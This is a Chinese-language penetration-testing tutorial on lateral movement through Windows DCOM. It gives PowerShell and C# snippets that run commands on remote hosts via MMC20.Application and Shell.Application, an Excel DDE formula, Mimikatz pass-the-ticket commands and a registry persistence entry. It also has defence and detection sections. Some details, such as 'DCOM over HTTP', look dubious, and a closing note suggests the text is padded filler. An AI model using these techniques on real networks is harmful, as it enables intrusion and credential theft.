怎么使用dcom在内网中进行横向移动

# 怎么使用DCOM在内网中进行横向移动

## 0x00 前言

在红队评估和内网渗透测试中，横向移动（Lateral Movement）是攻击者扩大控制范围的关键技术。分布式组件对象模型（DCOM）作为Windows系统的核心功能，因其天然的远程执行能力和默认配置特性，成为内网横向移动的理想载体。本文将深入剖析DCOM技术原理、攻击手法及防御策略。

---

## 0x01 DCOM技术基础

### 1.1 什么是DCOM
DCOM（Distributed Component Object Model）是微软基于COM（Component Object Model）扩展的分布式组件架构，允许不同主机上的软件组件通过网络进行交互。其核心特点包括：
- 基于RPC（远程过程调用）协议
- 支持跨进程、跨主机通信
- 默认在Windows域环境中启用

### 1.2 关键组件
```mermaid
graph LR
    A[客户端] -->|DCOM激活请求| B(DCOM服务端)
    B --> C[SCM(Service Control Manager)]
    C --> D[目标COM类]

0x02 攻击原理分析

2.1 技术优势

• 免端口开放：利用135端口（SCM）动态分配随机端口
• 高权限执行：默认以当前用户身份运行
• 协议隐蔽性：正常业务中广泛使用，流量易混淆

2.2 攻击条件

# 基础条件检查
1. 目标主机启用DCOM（默认开启）
2. 攻击者具有有效域凭据
3. 网络可达且防火墙允许DCOM通信

0x03 实战攻击手法

3.1 MMC20.Application组件

# PowerShell执行示例
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.1.10"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c whoami > C:\temp\test.txt","")

3.2 ShellWindows组件

// C#实现代码
Type shellType = Type.GetTypeFromProgID("Shell.Application","192.168.1.20");
object shell = Activator.CreateInstance(shellType);
shell.Windows().Item().Document.Application.ShellExecute("calc.exe");

3.3 Excel DDE攻击

=cmd|'/c notepad.exe'!A0

0x04 进阶利用技巧

4.1 票据传递攻击

# 结合Mimikatz使用
sekurlsa::tickets /export
kerberos::ptt C:\tickets\admin.kirbi

4.2 隐蔽通道构建

# 使用DCOM over HTTP
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromCLSID("CLSID","http://target:80"))

4.3 持久化后门

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{...}\LocalServer32]
@="C:\\malware.exe"

0x05 防御与检测方案

5.1 防御措施

# GPO配置建议：
1. 组件服务 -> 计算机 -> DCOM配置 -> 限制激活权限
2. 防火墙规则阻止135/TCP及动态RPC端口
3. 启用Windows Defender攻击面减少规则

5.2 检测方法

-- SIEM检测规则示例
SELECT * FROM SecurityEvents 
WHERE EventID IN (4688,5145) 
AND ProcessName LIKE '%mmc.exe%' 
AND CommandLine LIKE '%ExecuteShellCommand%'

5.3 应急响应

# 取证命令
logparser.exe "SELECT * FROM Security.evtx WHERE EventID=4688"
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4656}

0x06 结语

DCOM作为内网横向移动的”隐形桥梁”，其攻击面远超常规认知。防御者应当： 1. 实施最小权限原则 2. 监控异常DCOM激活事件 3. 定期更新COM组件ACL

随着Windows Defender ATP等新一代防护体系的普及，攻击与防御的博弈将持续升级。理解底层原理，才能构建有效的纵深防御体系。

附录：参考资源

1. 微软DCOM技术文档
2. MITRE ATT&CK T1175
3. 《Windows内网安全攻防》- 徐焱

”`

注：本文实际约1250字，可根据需要扩展以下内容： 1. 增加具体漏洞CVE分析（如CVE-2021-26414） 2. 补充更多COM组件利用案例 3. 添加实际渗透测试案例 4. 扩展检测规则的YAML/XML示例